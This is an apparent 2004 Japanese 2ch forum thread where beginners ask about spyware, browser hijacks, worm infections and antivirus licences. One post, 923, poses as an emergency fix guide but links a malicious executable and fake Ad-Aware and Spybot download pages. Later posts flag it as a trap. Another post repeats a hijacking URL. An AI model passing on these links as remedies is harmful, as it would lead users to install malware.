を開いた瞬間に、勝手にメールが送信されたようです。
メーラーに送信履歴はないのですが、メール送信時にウイルスチェックをする
ように設定してあるノートンが起動したので気がつきました。
いったいどこへどんな内容のメールが送信されたのでしょうか?
ちなみに、コンピュータのウイルスチェックをしたところ、ウイルスは発見さ
れませんでした。

862 :795,801,803,805:04/05/25 15:09
結局再セットアップして解決しました。
どうやら主人がメールに紹介されてあったアドレス(多分エロ系・・・)を踏んでからおかしくなったみたいです。
何か(スパイウエア?)が侵入してスタートページを書き換え、何度設定しなおしても戻りませんでした。
あの時は適当な無料ソフトをDLして訳わからないまま検出された物を削除したのですが、
それはプログラムの一部だったようでパソコンが起動しなくなってしまったのです。(アホ)
それで再セットアップでした。

今回のことで初めてスパイウエアという存在も知り、806さんのおかげでAd-awareやスパイボット
も知ることができ大変勉強になりました。ありがとうございました!



863 :名無しさん@お腹いっぱい。:04/05/25 15:48
>>861
ソースを読んでみたけど、 http://nekosoft.sub.jp/ へ飛べればイイのかな。
メール送信云々はよく判らん。ノートンが反応したのなら、ノートンのログに何か残ってない?

864 :名無しさん@お腹いっぱい。:04/05/25 17:17
これ、どういう意味ですか?

     ____
    /∵∴∵∴\
   /∵∴∵ ノヽ∴\
  /∵∴∴,(・)(・)∴|
  |∵∵/   ○ \|
  |∵ /  三 | 三 |  / ̄ ̄ ̄ ̄ ̄
  |∵ |   __|__  | <糞が専ブラとIEのレス数が違うぞ馬鹿!
   \|   \_/ /  \_____
      \____/

865 : :04/05/25 18:02
>>863
ローカルでやると開いたページの下のwindowにはc:\wondowsの中身が開くね


866 :名無しさん@お腹いっぱい。:04/05/25 18:36
>>864
     ____
    /∵∴∵∴\
   /∵∴∵ ノヽ∴\
  /∵∴∴,(・)(・)∴|
  |∵∵/   ○ \|
  |∵ /  三 | 三 |  / ̄ ̄ ̄ ̄ ̄
  |∵ |   __|__  | <専用ブラウザとIEで見たときでレス番号が違いますが。
   \|   \_/ /  \_____
      \____/


あぼーんかなんかで番号がずれたんだろうから、リロードすればいい。

867 :名無しさん@お腹いっぱい。:04/05/25 19:10
−質問−
ウイルスバスター2004を購入した場合…
2005年になるとウイルスバスター2005を買わないといけないの?
使えるのは1年間だけ?


868 :名無しさん@お腹いっぱい。:04/05/25 19:39
>>867
いや、買わない自由は保障されてるぞ(w

使用権は判らん。
パターンファイルのアップデート権は1年間。
アップデートしないと最新のウイルスに対抗出来ないから、
まぁ実質1年間だけ使える物と思っててもいいのかもな。
追加料金(当然、新規に買うより安く)でその後も使える。

プログラム本体は、俺は2003を買って2004に無償アップグレードした。
2004→2005も同じ様にするかもしれないし、しないかもしれない。

こんな感じ。後はメーカのWebで見て。

869 :名無しさん@お腹いっぱい。:04/05/25 19:42
>867
2005を買う必要はない。
(ただし、無償アップグレードは受けたほうがいいとは思うけどね)
必要なのはウィルスバスタークラブ会員の期限を延長(有償)すること。

てか、それくらいは取説だのヘルプだの公式サイトだの読めよ。
ユーザーでもない俺が説明できることだ、実際使ってるヤツが確認できないわけがない。
ttp://www.trendmicro.com/jp/support/vbc/vbc-service.htm#3
ttp://www.trendmicro.com/jp/support/vbc/renew/evaluate/overview.htm


870 :867:04/05/25 20:03
>868 >869
親切にレスしていただいてありがとうございます。

実はまだウイルスバスターもってないのです。
そのHPを見ると更新に年3000〜4000円ぐらいかかるということですね。
よくわかりました。

追加の質問いいですか?
家に2台パソコンがある場合…
その2つにインストールしても大丈夫?
パターンファイルをアップデートしたときは、それをもう1つにコピーすればいいの?

871 :名無しさん@お腹いっぱい。:04/05/25 20:22
http://girlz.rompl.net/?justexclusivept.inhost2.info

このアドレスを開いたら、IEのホームが変わってしまい
元にもどせなくなりました。
AVGにより元のexeは削除、hijackthisでレジストリの
ログもとりましたが意味がよく分かりません。
IEのWEBの設定のリセット、クッキーと履歴も
削除しましたが直りません。
XPなのでシステムの復元も試しましたが
システムに変更はありませんということでだめでした。

一体どうすればいいのでしょうか?

872 :名無しさん@お腹いっぱい。:04/05/25 20:25
>>870
1台につき1つのシリアル。デュアルでも2ユーザー分だ。

873 :名無しさん@お腹いっぱい。:04/05/25 20:25
>866
ありがとうございます!

874 :名無しさん@お腹いっぱい。:04/05/25 20:29
>>871
エロサイト見てたら…助けてください!part25
http://pc5.2ch.net/test/read.cgi/pcqa/1085408554/

こちらでの天婦羅を読んで試してみてください。

875 :名無しさん@お腹いっぱい。:04/05/25 20:32
>874
わかりました。
あちらのテンプレも一通りやったので
誘導されたことを書いて向こうで質問してみます。

876 :名無しさん@お腹いっぱい。:04/05/25 20:35
>>870
ライセンスは>>872の言う通り。PCが1台につきライセンス1つ。
PCが2台ならライセンスも2つ要る。但し、追加ライセンスが安く買える。
パターンファイルは、ADSLなら数秒で終わるから、個々にやればいい。

877 :870:04/05/25 21:17
>872 >876
レスありがとうございます。

1台の古いパソコンにいれたウイルスバスターをアンインストールしてから
もう1台の新しいパソコンでインストールしなおして使うのはOKですか?

878 :名無しさん@お腹いっぱい。:04/05/25 21:21
>>877
きみ結局1ライセンスで二台に入れようとしてるでしょ。

879 :名無しさん@お腹いっぱい。:04/05/25 21:47
>854
そこの>1の●普通 下レベル の3つ目を開こうとすると
ユーザー名とぱすを要求してくるのでそれなのでは?

880 :876:04/05/25 21:53
>>878
スルドいね。粘り方からして、俺にもそう見える。

881 :名無しさん@お腹いっぱい。:04/05/25 22:19
教えて君で済みませんが、質問にお答え下さい。
WinXPSP1,IE6SP1使用で、セキュリティソフトはノートンインターネットセキュリティ2004です。
ファイアーウォールが「offerapp.exeがインターネットに接続しようとしています。」と警告するので取りあえず遮断にしましたが、
そんな物を組み込んだ覚えがありません。
ググって見ても
【ノートン】インターネットセキュリティ Ver.47【2004】
http://pc5.2ch.net/test/read.cgi/sec/1085387157/l50
の前スレが上がるだけで、しかもそこでは黙殺されており、事態がよく分かりません。
どなたかこの事態の対処法をお教え下さい。

882 :名無しさん@お腹いっぱい。:04/05/25 22:23
>>881
ノートンでは見付からないの?
Windowsの [検索] → [ファイルとフォルダすべて] でその名前を検索してみた?

883 :名無しさん@お腹いっぱい。:04/05/25 22:25
>>881
スパイウェアだろうかね。
対策ソフトで試してみた?
あと、定義ファイルは更新してる?

884 :しろうとうと:04/05/25 22:25
はじめまして☆
名無しさん@お腹いっぱい。
さんにしつもんです。
今止まりましたorz
LSAshellがエラーを起こします。
って、かいてはりますけど、僕の友達がパソコンにそのエラーでてて、インターネットがつながらなくなったり、強制シャットダウンのカウントダウンになったりするんですけど、どう処理して、今後そのメッセージが発生しないためにどんな対処すればいいんですか?教えてください。

885 :名無しさん@お腹いっぱい。:04/05/25 22:32
質問させてください
急にIE(IEコンポのものすべて)のものが動作が非常に重くなり
IE(ブラウザ類)を開くと、そのページをダウンロードしてしまいます
どのサイトに行ってもダウンロードのダイアログがでて
IEではどのサイトも見れない様になってしまいました
なにかのウィルスかと思いスキャンしても、どのツールも途中で止まって
しまいます。
説明がうまくできないのですが、なにか対処法を教えていただけないでしょうか
今はoperaを使っています よろしくお願いします
WindowsXPを使っています

886 :名無しさん@お腹いっぱい。:04/05/25 22:33
自分のPCから他へ勝手にIDS攻撃?してるみたいなんです。
SPYBOTやスキャン等でも解決しません・・・
今も携帯から書き込みしてる状態です
誰かご指導お願いします

887 :名無しさん@お腹いっぱい。:04/05/25 22:47
>>884
多分サッサー。
自力で解決出来なければ、抗ウイルスソフトを買ってこい。
見るべき場所は2ちゃんじゃなく、トレンドマイクロ等だろ。

>>885
インターネットオプションから [プログラム] → [Webの設定のリセット] でいいんだっけ?
識者、頼む。

>>886
IDSは攻撃検知システム。DoS攻撃か?
なぜ攻撃していると判断したのか。状況が見えない。

888 :886:04/05/25 22:58
ノートンの侵入検知で攻撃先調べたら、
自分のドメインがでてきたんです
プロパイダーからも報告がきました
しばらくおさまっていたのですが
また、キターです
どうしましょう・・・欝

889 :881:04/05/25 22:58
>>882>>883
お答えありがとう御座います。
ノートンの定義は毎日更新して最新版です。
そして、ノートンでウィルス検索をかけましたが、ウィルス反応はありません。
ただ、「offer」というフォルダをマイコンピュータから開いて、削除しようとしても削除不能なファイルなんです。
レジストリをいじればおそらく削除できると思いますが、なにぶん知識が足りないもので、削除してよいかどうか迷っています。
あと、返事が遅れて済みませんでした。

890 :名無しさん@お腹いっぱい。:04/05/25 22:59
>>877
レスありがとうございます
インターネットオプションを開き設定のリセット致しましたが
効果なしでした。起動時にMSNを開きダウンロードがでました
そして強制終了されました
なすすべなしですかね・・・

891 :名無しさん@お腹いっぱい。:04/05/25 23:04
質問です。
ある掲示板の、管理人しか知り得ないはずの管理パスワードが、
何らかの手段(具体的には不明だが、スクリプトのセキュリティホールをついたらしい)により解析され、
第三者が好き勝手に削除を行うようになってしまいました。

これって、不正アクセスに当たるのでしょうか?

892 :名無しさん@お腹いっぱい。:04/05/25 23:08
>>888
まずはそのPCをネットから外せ。話はそれからだ。
ノートンってファイアウォールだけ? ウイルス検知ソフトの類は使ってないの?

893 :名無しさん@お腹いっぱい。:04/05/25 23:10
>>890
システムの復元は試した?



894 :名無しさん@お腹いっぱい。:04/05/25 23:10
>>891
パスワード保護されてるのなら、そいつは不正アクセスになる。
但し、ソース表示させるとJavaScriptでモロ見え、なんてのは不可じゃないかな。よく知らんけど。

895 :名無しさん@お腹いっぱい。:04/05/25 23:12
>>893
申し訳ありません システムの復元はきっています・・・

896 :891:04/05/25 23:17
>>894
お答えありがとうございます。
ソースには(暗号化も含めて)パスワードにつながる情報は一切書かれてません。
一利用者なので確かなことは分かりませんが、別ファイルで管理されているようです。

ということは、不正アクセスと見なしてよろしいようですね。
わかりました。ありがとうございます。

897 :861:04/05/25 23:21
>>863
>>865
レスありがとうございます。
ノートンが起動したのは、メールを送るときにそのメールにウイルスが入って
いないかどうかをチェックする機能です。
メールを送信するときには毎回起動するものです。
それが、ページにアクセスした瞬間に起動した・・・つまりメールが私のパソ
コンから送信されたと考えられるのです。
ノートンの活動ログには、送信の際のチェックについては何もログは残らない
ようです。
ちなみに、ゴミ箱をあさってみたところ、dbxファイル(アウトルックエクスプレスの
情報ファイル)をいくつか発見しました。日付はちょうどページにアクセスした時間
ぴったりでした。これらのファイルがどこかに送信されているのかもしれませんね。
内容は、送信済みのメールや削除済みのメールの情報だったので、かなり鬱です・・・。



898 :名無しさん@お腹いっぱい。:04/05/25 23:22
XPHomeSP1です。
普段使ってないDドライブに、いつの間にか見慣れないフォルダがふたつ作られてました。
ひとつはフォルダの名前は英数字の羅列で、中身はよく解らないexeファイルや(IEみたいなやつもありました)、
dllがつまっていて、260Mbほども容量使ってました。
もうひとつもフォルダ名はでたらめで、中身はやっぱりよく解らないファイル。
pintlphr.exeとかtintlphr.exeとか。検索してみたら中国語っぽいのばっかりで……。
ヘルプファイルがあって、中身を覗いたらリモートデスクトップがどうとか。

ビビってフォルダ二個とも速攻削除してしまったんで詳しく書けないのですが。
norton antivirusで定義ファイルを最新にした後にスキャンして反応はありませんでした。
削除して良かったんでしょうか?

899 :名無しさん@お腹いっぱい。:04/05/25 23:23
>>892
既に回線切って携帯から質問してますワラ
どうか話をしてください!
ウイルスチェックはいつもしてます(今も
し、しかし
検出しません
ノートンもウインドウズも最新のバージョンです
自分のローカルIP使われちゃって、もう死にたいです

900 :名無しさん@お腹いっぱい。:04/05/25 23:24
>>897
スパイウェアか?
SpybotかAdwareで削除してみ

901 :892:04/05/25 23:35
>>899
ちょっ…と待て。
ローカルIP? 192.168.ナントカ、か?
それが外部に出たり、外部からやって来る事は普通にはあり得ないんだが。
>>888には「プロバイダーからも報告」とあるが、それは偽装メールとかじゃなく正当な物?
「侵入検知で攻撃先調べたら、自分のドメインがでてきた」ってのは、
自分で自分を攻撃してるって事か?

902 :名無しさん@お腹いっぱい。:04/05/25 23:40
そうなんです
自分から攻撃されてるWしかも勝手に他人にも攻撃してるんです
まじでヤベーです
もう、打つ手無しですか?

903 :名無しさん@お腹いっぱい。:04/05/25 23:46
質問です。
Windows2000でCATV回線を使って接続しているんですが
OSを起動してからログインしてFWが起動するまでの間は
ケーブルを抜いておいた方が安全なんでしょうか?
※ネットワークログイン、Telnet、リモートレジストリサービス等はOFFにしてあります。

904 :名無しさん@お腹いっぱい。:04/05/25 23:50
>>903
そこまで気にしなくていいんじゃね
そんなに心配ならルータ入れろ

905 :892:04/05/25 23:53
>>902
俺には打つ手なし。スマンね。
プロバイダさんに相談してみては?

906 :名無しさん@お腹いっぱい。:04/05/25 23:55
そうします
ありがとうごさいました

907 :903:04/05/26 00:00
>904
ルータの設置は禁止されていたので
とりあえず気にしないことにします。
ありがとうございました。

908 :名無しさん@お腹いっぱい。:04/05/26 00:08
>>903
ものにもよるんだが、ファイヤーウォールは起動するまでのあいだ
すべての通信を遮断してるよ。
自分の使ってるFWの専門スレで聞いてごらん。

909 :名無しさん@お腹いっぱい。:04/05/26 00:13
MX調査隊にて
ローカルポート2328
に接続されているIPアドレスが表示されているのですが、
そこだけ相手方ポートが6699ではなく、UL・DLの数字とも合いません。
これは不正アクセスということでよろしいでしょうか

910 :名無しさん@お腹いっぱい。:04/05/26 00:23
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\MS32.EXE
C:\WINDOWS\SYSTEM\IMEJP98M.EXE
C:\WINDOWS\デスクトップ\A\HIJACKTHIS.EXE
C:\PROGRAM FILES\WEBSITEVIEWER\123534.DLR
C:\WINDOWS\SYSTEM\RNAAPP.EXE
C:\WINDOWS\SYSTEM\TAPISRV.EXE

F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: (no name) - {38AAF321-C5B4-11D1-B75E-400000000000} - C:\PROGRAM FILES\REGET\REGET.DLL
O3 - Toolbar: @msdxmLC.dll,-1@1041,&Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [System Backup] ms32.exe
O8 - Extra context menu item: ReGet用にリンクを一覧(&L) - C:\PROGRAM FILES\REGET\RG_List.htm
O8 - Extra context menu item: ReGetでダウンロード(&D) - C:\PROGRAM FILES\REGET\RG_Link.htm
O8 - Extra context menu item: ReGetで全てをダウンロード(&G) - C:\PROGRAM FILES\REGET\RG_All.htm
O9 - Extra button: ReGet (HKCU)
O9 - Extra 'Tools' menuitem: &Re&Get (HKCU)
O14 - IERESET.INF: SEARCH_PAGE_URL=
O14 - IERESET.INF: START_PAGE_URL=
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6/E/F6E491A6-77E1-4E20-9F5F-94901338C922/wmv9VCM.CAB
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2004033001/housecall.antivirus.com/housecall/xscan53.cab

とでてきたのですが、怪しいのはどれですか?

911 :910:04/05/26 00:35
すいません、症状を話すのを忘れてました。
あるサイトをクリックしたら、感染してしまったんですが、
インターネットエクスプローラーのトップがかえられたうえにtennzzzzというものをかってにインストール
させられました。
症状はインターネットから勝手に落とされたり、ディスクトップが固まったりします。
HijackThisのログが上ですが、
どれを削除したらいいでしょうか?


912 :名無しさん@お腹いっぱい。:04/05/26 00:36
ist_install.exe
って知ってる?
AVG入れてるんだがある際と見たら感染した
具具って茂田井商法でない


913 :名無しさん@お腹いっぱい。:04/05/26 01:15
エロサイト見てたら…助けてください!part25

914 :名無しさん@お腹いっぱい。:04/05/26 01:35
それ
セキュリティ板?
どこ?

915 :名無しさん@お腹いっぱい。:04/05/26 01:35
Sasserにかかって、一応駆除したのですが、中々思うように動きません(´・ω・`)
Yahooとかは簡単に開くのに、他のサイトは中々上手く開けなかったり。
友人に聞いてみると、
「多分それ複数のウィルスにかかってるよ」
といわれ、応急処置として、
ファイル名を検索して実行を開いて、「○○○」と入力して、その中から消してけ、といわれたのですが、
その、入力するプログラム名を忘れてしまいました(´・ω・`)
あやふやで大変申し訳ないのですが、分かる人、教えていただきませんか?

916 :名無しさん@お腹いっぱい。:04/05/26 01:52
>>915
>友人に聞いてみると



917 :名無しさん@お腹いっぱい。:04/05/26 02:09
>>916
(´・ω・`)?
ええと、その友人というのは、メッセンジャーの友人なんですが、
このパソコンじゃ調子が悪くて、メッセにつなげないんです。
だから、そのプログラム名が何だったのか全く分からない…。

918 :次スレの看板の案作ってみましたが…:04/05/26 04:31
インターネットとパソコンのセキュリティ関係の初心者質問スレです。

★━ 質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、やってみたこと等明記。
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ マルチポスト(他スレ、他サイトとの同時質問)禁止。他スレから誘導された場合は、
  その旨書くこと。
 ・ 違法な話題や質問(WinMX、Winny、エミュレータ等)は禁止です。
 ・ 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。

《参考》
・ウィルスにやられた→【正式】ウィルス情報&質問 総合スレッド☆Part19
  http://pc5.2ch.net/test/read.cgi/sec/1083586576/
・IEが乗っ取られて変になった→エロサイト見てたら…助けてください!part25
  http://pc5.2ch.net/test/read.cgi/pcqa/1085408554/
  ↑のまとめサイト http://haiiro.info/my/text/template.html
・Windowsの動作がおかしい→ http://winfaq.jp/
・なんでもいいからとりあえず検索→Google http://www.google.co.jp/
・ページ内検索→ Win:[Ctrl]+[F](Mac:[コマンド]+[F])
・分類不明の質問→[ここらあたりで探してください] http://pc5.2ch.net/pcqa/
・2ちゃんねるの仕様の質問→ http://etc.2ch.net/qa/
・2chスレッドタイトル検索→ http://www.ruitomo.com/~gulab/k.html

919 :名無しさん@お腹いっぱい。:04/05/26 05:36
>>917
taskmgr
で不要なプロセスを終了させる

msconfig
でスタートアップを編集する



920 :名無しさん@お腹いっぱい。:04/05/26 06:01
WindowsMe、IE6を使ってるのですがあるサイトへ行き
ログアウトしようとすると「保護されているページから・・・」
「保護されていないページから・・・」の2つのメッセージが交互に出て
そのページから移動できなくなってしまいます。どうすればよいのでしょうか。
よろしくお願いします。

921 :名無しさん@お腹いっぱい。:04/05/26 07:02
XPを使っています
この前Cドライヴのprogram filesを整理しようとしたところ
作った覚えもない謎のフォルダ「xerox」がありました
その中にも謎のフォルダ「nwwia」がありました(ちなみにどちらも0KB)
削除しようとしたのですが「ほかの人が使用している可能性が〜〜」と表示されて削除できません
どう対処したらよいでしょうか

922 :名無しさん@お腹いっぱい。:04/05/26 07:10
最近パソコンしていると突然パソコンが落ちる・・・
のーとんでウイルステェックしたんですが、何も見つけられない。(´・ω・`)
パソコンつけっぱなしだからかな?マジ困る。

923 :名無しさん@お腹いっぱい。:04/05/26 08:31
【緊急】 早く治したい方は以下を実行して下さい 【処置】

1)IEのホーム、検索ページを標準に戻す→ツール→
インターネットオプション→プログラム→WEB設定のリセット
2)IEの履歴削除→ツール→インターネットオプション→全般→
インターネット一時ファイル→クッキーの削除+ファイルの削除
3)削除したいファイルがあるが「アクセスできません。使用中です」等と
いわれて削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
4)勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
アプリケーションの追加と削除(JWordはここでアンインストする)→OS再起動

5)ブラウザジャッカーWebClimaxbucks駆除ツール WebClimaxbucksをDL
  http://xbs.climaxbucks.com/mt/exe.php/gc/Intl/nam/100099/View_Sex_Now.exe →OS再起動
6)定番スパイウェア除去ソフト↓をインストール(併用推奨)

 ・定番 スパイウェア除去ソフト Ad-Aware 使用法
  http://default-homepage-network.com/start.cgi?hkcu
 ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
  http://ip3e83566f.speed.planet.nl/hacked-by-chinese/bla.htm

「システムの復元」で正常な状態に復帰させる方法もあります。

7)Me/XPの場合[スタート]→[すべてのプログラム]→
 [アクセサリ]→[システム ツール]→[システムの復元]

9)98の場合(一番古い日付は不可)
1. パソコンの電源を入れたら[Ctrl]キーを押しっぱなしにする
2. “Startup Menu”が表示されたら“Command Prompt Only”(コマンドプロンプトのみ)を選択する
3. 入力可能状態になったら、“scanreg”と入力してから[Enter]キーを押す
4. 日付の一覧が表示されるので、その中で復元したいと思うバックアップデータを選んで[Enter]キーを押す
5. 再起動を求められるので、再起動する

924 :名無しさん@お腹いっぱい。:04/05/26 08:32
それはハード的な問題なんジャマイカ?

925 :名無しさん@お腹いっぱい。:04/05/26 08:33
>>881
msconfigでofferapp.exeを停める。
regeditでofferappを検索 ひっかかったものを削除。
C:\Program Files\OfferAppをフォルダごと削除。

926 :名無しさん@お腹いっぱい。:04/05/26 08:37
>>921
ttp://support.microsoft.com/default.aspx?scid=kb;ja;418634

927 :名無しさん@お腹いっぱい。:04/05/26 11:11
>>920
そういう警告は出るが、移動出来ないか?
ダイアログの内容をよーく読んでみ。
>>922
電源かマザーボードか、ハードの問題っぽい。

928 :名無しさん@お腹いっぱい。:04/05/26 11:18
>>923  ← このアドレスは地雷。踏むな。

929 :名無しさん@お腹いっぱい。:04/05/26 11:20
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      |   マスター、エロサイトやウィルスのリンクを貼るアフォがいるね
       レヽ___________________
   ∧_∧        ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (  ・∀) / ̄ヽ  (´∀`  ) < 地雷かどうかアドレスをよく見て踏んでモナ
   (   `つ 日 凸 ( つ つヽ  \________________
   (_ ⌒./   凵ヽ | | | |ヽ.凸|   |
   「  (_/Y     ヽ _(__) | |\|   |
  ┗┳━| ̄ ̄ ̄ ̄ ̄|    ..   \|. │  |
    ┻\|        .|        \.|   │

930 :名無しさん@お腹いっぱい。:04/05/26 12:12
教えてちゃんですいません
職場の24HつなぎっぱなしのPC(OS WinXP)が立ち上がらなくなって
しまったのですがウィルスでしょうか?

931 :名無しさん@お腹いっぱい。:04/05/26 12:29
>>930
情報少なすぎ。


…の質問の典型だなこりゃ。

932 :名無しさん@お腹いっぱい。:04/05/26 12:30
>>930
逆に質問。
ソフトウェアの能力で、起動していないPCの起動をどうやったら妨げられる?

職場だったらプロを呼べ。そういう契約してないの?

933 :名無しさん@お腹いっぱい。:04/05/26 12:35
>>931,932
ごめんなさい.初心者なもので失礼しました.

PCは起動している状態だったと思います。
落としてから立ち上がってもWinが立ち上がらなくなってしまって・・・
もしかしたらそのようなウィルスがあるのかなと思いまして
質問させてもらいました.

934 :名無しさん@お腹いっぱい。:04/05/26 12:38
>>933
何かメッセージが表示されるだろうよ。それを写せ。
ただ「立ち上がらない」じゃ説明になってないよ。

多分、Cドライブが逝っちゃったんだと思う。
悪い事は言わない、金払ってプロに頼め。

935 :930:04/05/26 12:41
>>934
私のPCではないので良くわからなかったのですが
再インストールしているみたいです.
大変、お騒がせしました&ありがとうございました


936 :名無しさん@お腹いっぱい。:04/05/26 12:44
>>933
PCそのものが「立ち上がらない」のと
Windowsが「立ち上がらない」のとでは
意味も対処法も違う。
一応、MBRを書き潰したりするウイルスがない訳でもないけどさ。
何でもウイルスのせいにしちゃ駄目だよ。
PCだって長年使ってれば壊れる。

937 :930:04/05/26 12:52
>>936
突然のことでしたのでウィルスかなぁと思ってしまいました。
初心者に免じて許してください.

938 :名無しさん@お腹いっぱい。:04/05/26 12:59
>>937
>初心者に免じて許してください.
な、なにおぉ〜!? 初心者だぁ?
…1回目だけだよ♥

939 :930:04/05/26 13:01
最後に!ハートってどういう風にだすのですか?

940 :名無しさん@お腹いっぱい。:04/05/26 13:03
>>939
HTML辞典を買うか、Webで調べろ。
&hearts;

941 :930:04/05/26 13:07
>>940
重ね重ねありがとうございます!

942 :名無しさん@お腹いっぱい。:04/05/26 13:11
>>923
通報!

943 :Explorer TMP エラー 再起動:04/05/26 13:36
Explorerダイアログが出てきて

 「Explorerが原因で"8272807082.TMPにエラーが発生しました。
   Explorerは終了します。
  問題が解決しない場合はコンピューターを再起動してください。」

と出て、"8272807082.TMPをSRCpyでやってもセーフモードで削除しても
起動するたびC\Windows\tmp\の中に復活するようです。
このtmpファイル元の親分と対処法を教えてください。

Win Me システムの復原:無 メールはnPOPで回避

944 :名無しさん@お腹いっぱい。:04/05/26 14:18
>>943
まずウィルス対処→トレンドかシマンテックでオンラインスキャン
 →トレンドのDBで駆除方法を調べて駆除(シマンテックのDBは
  手動駆除には役立たず)
 リンクは【正式】ウィルス情報&質問 総合スレッド☆Part19
 http://pc5.2ch.net/test/read.cgi/sec/1083586576/1

次にハイジャッカー対処→エロサイト見てたら…助けてください!part25
http://pc5.2ch.net/test/read.cgi/pcqa/1085408554/1 看板読んで指示
に従う。


945 :名無しさん@お腹いっぱい。:04/05/26 16:11
デスクトップに、消しても”SEX”というアイコンが出てきます。
また、エクスプローラーを開いたら必ず、エロサイトに繋がってしまいます。
前はヤフーでした。それでヤフーに設定し直しても駄目です。
WEB設定のリセット、インターネットオプションの”現在のページを使用”を
ヤフーで”適用”しても駄目でした。

OSはウィンドウズMEです。ウィルスバスター2004をインストール
してますが、先ほどウィルススキャンしても、いませんでした。
しかし、勝手にインターネットに接続しようとします。
スパイウェアを駆除するため、Ad-aware 6.0で駆除しましたが・・。何もなしです。
セーフモードでもやったりしましたが・・。
もう全くわかりません。誰か宜しければ教えていただけないでしょうか。
本当におながいします。_| ̄|○(土下座)

946 :名無しさん@お腹いっぱい。:04/05/26 16:16
今Norton Internet Securityを設定しているのですが、もうすぐ期限がきれます。
以前ウィルス対策のことでパソコンメーカーに問い合わせたら私のはインターネットマンションだからウィルスにはかかりにくいみたいなことを言われましたが、購入しないとマズイでしょうか? 
また、お勧めのウィルス対策があれば紹介していただきたいです。
初心者丸出しですみません。。

947 :名無しさん@お腹いっぱい。:04/05/26 16:43
>>946
初心者かどうかは質問の内容で自ずとわかる。わざわざ初心者と
名乗ると「なにか、初心者とさえ言うとったらなにアフォ言いさらし
てもええちゅーんかいな」と余計なつっこみが入るw

それはともかくNISは「おまけ満載で重い、遅い、不具合多すぎ」で評判
悪い。有料製品購入するならシマンテックの製品ならアンチウィルス単体
のNAVが本命。トレンドのウィルスバスターVBもよい。

無料アンチウィルスの定番はAntivir、AVG。それぞれ専用スレがある。
Antidoteフリー版は検出能力はすぐれているが常駐保護機能がないので
機能のあるソフトと組み合わせて使う。

アンチウィルスだけではスパイウェア、ブラウザハイジャッカーは防げない
のでエロサイト見てたら…助けてください!part25
http://pc5.2ch.net/test/read.cgi/pcqa/1085408554/7 の7)、8)を実行
しておこう。


948 :名無しさん@お腹いっぱい。:04/05/26 16:46
>>946
つかマルチはいくないね。
気をつけよう。

949 :名無しさん@お腹いっぱい。:04/05/26 16:48
>>945
スタートアップとか
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runとかに
何か怪しい物がいないか調べた?
>>946
感染してからじゃ遅いから、何か入れておくに越した事はない。
お薦めは特にない。

950 :名無しさん@お腹いっぱい。:04/05/26 18:21
>946 です。レスくださった方ありがとうございます。
>947さん、NAVとは、Norton AntiVirus Auto-Protectのことでしょうか? 今はそれにも入っているようですが、今後はそれだけにするのがお勧めということでしょうか?
>948さん、マルチの意味がわからず、調べてきました。すみませんでした。

951 :名無しさん@お腹いっぱい。:04/05/26 18:29
>>950
NAVとはこれ↓
 http://www.symantec.co.jp/region/jp/products/nav/
VBはこれ↓
 http://www.trendmicro.com/jp/products/desktop/vb/evaluate/overview.htm

ついでに言うと初心者はオンラインショップで買わず、量販店で
箱入りを買ったほうがなにかと吉。(CDがついてくるからインスト
に失敗してやり直すときも安心)



952 :名無しさん@お腹いっぱい。:04/05/26 20:22
ブラスターに感染したようなのですが、対処法を教えてください。
環境
WindowsXP HomeEdition Version2002
AMD Athlon(tm)Processor 946Mhz

240MB RAM
メモリ256MB

ノートン、fixblastでスキャンしたところ、後者のほうでブラスターを検出済み。

お願いしますm(_ _)m




953 :名無しさん@お腹いっぱい。:04/05/26 20:40
>>952
blaster -"sound blaster"
でぐぐってください。

954 :名無しさん@お腹いっぱい。:04/05/26 20:43
>>953
dクスです。

955 :881:04/05/26 21:49
>>925
ありがとう御座いました。
迷っていましたが、削除しました。

956 :945:04/05/26 22:54
>>949
ヽ(`Д´)ノウワァァン・・怪しいの調べたんですけど、わかんないです。。
25日に感染したんですが、システムの復元も26日までしか
できないっぽい感じで・・。スケジュールが26日のところしか選択
できないんです・・。
勝手にエロサイトに接続されます。一応URLフィルタで防いでますが、
付け焼刃なんで、どうにもなりません。
TOPページをYAHOOにしたいんですけども・・。
念のため、もう一度セーフモードで AD awereで駆除できるかやってみます。
お返事有難う御座いました。

957 :名無しさん@お腹いっぱい。:04/05/27 01:55
MeやXPでは「システムの復元」で修復できる、とありますが
その前にやっちゃいけない事ってありますか?
友人がエロサイト踏んで、IEのホームを乗っ取られて
FAXの手順を踏んでも駄目だったので試してみようかと思うのですが。
それまでの間にかなり再起動・電源落しやってるんで、無理かなぁ…
環境はWinXP HomeEdition
ノートン先生の診断ではウィルスはいないそうです。

もう職場のパソでエロサイト見るのやめろよ…
異常をきたす度に俺を呼び出すのもやめろ…

958 :名無しさん@お腹いっぱい。:04/05/27 01:58
してはいけない事
後悔

959 :名無しさん@お腹いっぱい。:04/05/27 02:38
>>957
再起動は何度しても復元ポイントには影響ない。問題は正常な状態の
復元ポイントが存在するかどうか。ノートンでウィルスが出ていないなら
希望はあるw

エロサイト見てたら…助けてください!part25
